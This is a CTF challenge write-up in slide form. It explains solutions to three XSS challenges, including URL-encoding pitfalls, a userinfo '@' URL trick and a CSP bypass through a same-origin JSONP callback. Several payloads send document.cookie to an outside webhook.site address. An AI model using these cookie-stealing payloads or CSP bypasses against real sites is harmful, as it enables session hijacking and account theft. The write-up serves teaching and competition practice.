Miday - HackMD

# Miday Series CTF #### by legendyang aka yoni13 --- - Miday - Miday Revenge - Miday Revenge Revenge - Some final thoughts --- # Miday ### Simple XSS ##### should be simple (?) ---- ## What happened ---- ## Encoding ```+ -> " "``` (space) Common Wrong Payload: ``` http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=a%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/`+document.cookie)%3C/script%3E ``` ##### Also see:https://www.w3schools.com/tags/ref_urlencode.ASP ---- ## Result ![Pasted image](https://hackmd.io/_uploads/Skfc4vvM1g.png) #### no cookie ---- ## Intended Solution ``` http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/id-redacted/${document.cookie}`)%3C/script%3E ``` ##### Uses String Interpolation ---- ## Got Cookie ![image](https://hackmd.io/_uploads/rJwW1FPfkl.png) --- # Miday Revenge #### the little @ ---- ## What might be wrong? ---- ## Common Wrong Payload ``` http://docs.google.com@http://miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E ``` ---- ## Results..... ![image](https://hackmd.io/_uploads/Ske9Avwz1g.png) ---- ## Intended Solution ``` http://docs.google.com@miday_revenge_aaaaa.nicewhite.eu.org:60005/search?search=aa%22%3E%3Cscript%3Efetch(`https://webhook.site/redacted/${document.cookie}`)%3C/script%3E ``` ![image](https://hackmd.io/_uploads/rJh6JOPMJe.png) --- # Miday Revenge Revenge #### That Google CSP is a scam, I mean. ---- # CSP Policies? ![image](https://hackmd.io/_uploads/ryorbODG1x.png) ---- ## OK, I see. ![image](https://hackmd.io/_uploads/SJG_-dPzkx.png) ``` <meta http-equiv="Content-Security-Policy" content="script-src 'self' https://www.google.com; img-src 'self' ; default-src 'self'"> ``` ---- ![image](https://hackmd.io/_uploads/By6mGdvfye.png) ---- ![image](https://hackmd.io/_uploads/SJJMQdvzJg.png) ``` https://www.google.com/complete/search?client=chrome&q=123&jsonp=alert(1)// ``` ---- ### So steal cookie via Google.com JSONP? ---- # No. ---- ## fetch is blocked ![image](https://hackmd.io/_uploads/SkwoX_PGkl.png) ``` "><script src=https://www.google.com/complete/search?client=chrome&q=123&jsonp=fetch(`webhook.site/aa/${document.cookie}`)// ></script> ``` ---- ## Bypass Google.com JSONP filter? ---- Maybe, Me noob so I can't. ---- ### Wait ![image](https://hackmd.io/_uploads/B1HNHdwGJe.png) ---- ### XSS via JSONP ? ---- # YES ``` "><script src=/api/v1/getnews?callback=top.location=`meow`//></script>"> ``` ![image](https://hackmd.io/_uploads/H1D7UdPGJe.png) ---- ## So Intended Solution was... ``` http://miday_revenge_revenge.nicewhite.eu.org:60006/search?search=a%22%3E%3Cscript%20src=/api/v1/getnews?callback=top.location=`https://webhook.site/redacted/${document.cookie}`//%3E%3C/script%3E%22%3E ``` ---- # Works ![image](https://hackmd.io/_uploads/HJx28_PG1l.png) ##### Google CSP is a scam XD ---- --- ### My Final Thoughts ---- <p> Hello, thanks for reading.<br> I hope all of you had fun && learned something during the event.<br> Those challenge ideas came from the cool things I've learned during I research Cyber Security.<br> (And I dont expect that 'miday' was that hard XD) </p> ---- <p> We fixed a lot of unintended solutions, got DOSED during mid time (miday was hosted on my homelab, and it got knockout down 🫠) </p> ``` bash fork: retry: Resource temporarily unavailable ``` <p> And our main machine got OOE (Out Of memory) during competition, we have to contact out hoster to reboot it, and immediately setting RAM/CPU limit on those docker containers. </p> ---- ## Anyways, it was fun!